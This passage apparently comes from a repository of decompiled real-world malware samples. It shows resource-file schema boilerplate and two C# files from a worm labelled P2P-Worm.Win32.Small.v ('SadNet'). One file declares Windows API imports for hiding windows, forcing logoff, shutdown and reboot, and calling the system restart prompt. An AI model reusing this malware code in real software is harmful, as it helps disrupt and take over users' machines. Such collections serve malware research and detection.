<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.Properties.Settings
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace SadNet.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/api.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: SadNet.api
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using System.Runtime.InteropServices;
namespace SadNet
{
public class api
{
public const int SW_HIDE = 0;
public const int ConsoleWindowClass = 1;
public const string amir = "hi i'm devil worm";
public const int EWX_LOGOFF = 0;
public const int EWX_SHUTDOWN = 1;
public const int EWX_REBOOT = 2;
public const int EWX_FORCE = 4;
public const int EWX_POWEROFF = 8;
[DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
public static extern int mciSendString(
string lpstrCommand,
string lpstrReturnString,
int uReturnLength,
int hwndCallback);
[DllImport("user32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
[DllImport("user32")]
public static extern int MessageBeep(int wType);
[DllImport("kernel32")]
public static extern int Sleep(int dwMilliseconds);
[DllImport("user32", EntryPoint = "FindWindowA")]
public static extern int FindWindow(string lpClassName, string lpWindowName);
[DllImport("shell32", EntryPoint = "#59")]
public static extern int SHRestartSystemMB(int hOwner, string sExtraPrompt, int uFlags);
}
}